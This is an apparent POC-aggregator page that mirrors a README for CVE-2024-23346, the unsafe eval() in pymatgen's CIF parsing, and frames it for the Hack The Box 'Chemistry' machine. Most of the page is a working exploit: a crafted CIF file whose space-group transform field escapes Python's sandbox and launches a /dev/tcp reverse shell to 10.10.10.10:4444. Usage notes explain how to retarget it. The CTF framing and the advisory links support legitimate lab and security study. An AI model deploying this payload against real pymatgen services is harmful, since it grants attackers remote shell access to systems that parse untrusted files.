POC详情: 80dc7e5021a5cba4af60d7a1e46b00452d197e29

来源
关联漏洞
标题: Pymatgen 安全漏洞 (CVE-2024-23346)
描述:pymatgen是一个用于材料分析的开源 Python 库。 Pymatgen 2024.2.20之前版本存在安全漏洞,该漏洞源于不安全地利用eval()函数来处理输入,从而在解析不受信任的输入时能够执行任意代码。
描述
This repository contains a Crystallographic Information File (CIF) intended for use on the "Chemistry" machine on Hack The Box (HTB).
介绍
# CVE-2024-23346 (Chemistry - HTB)

This repository contains a Crystallographic Information File (CIF) intended for use on the "Chemistry" machine on Hack The Box (HTB).

## CIF File Example

```text
data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1
_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.10.10/4444 0>&1\'");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
```

## Usage
A system command is embedded in the ```_space_group_magn.transform_BNS_Pp_abc``` field. Modify the the ```system("/bin/bash -c 'sh -i >& /dev/tcp/10.10.10.10/4444 0>&1'")``` portion to suit your specific network or system requirements.

## Note
This file is provided for educational purposes only.

## Sources
- [thecybersecguru.com Chemistry Beginner's Guide](https://thecybersecguru.com/ctf-walkthroughs/mastering-chemistry-beginners-guide-from-hackthebox/) 
- [ethicalhacking](https://ethicalhacking.uk/cve-2024-23346-arbitrary-code-execution-in-pymatgen-via-insecure/#gsc.tab=0)
- [github - pymatgen](https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f)
文件快照

[4.0K] /data/pocs/80dc7e5021a5cba4af60d7a1e46b00452d197e29 ├── [1.0K] LICENSE └── [1.6K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。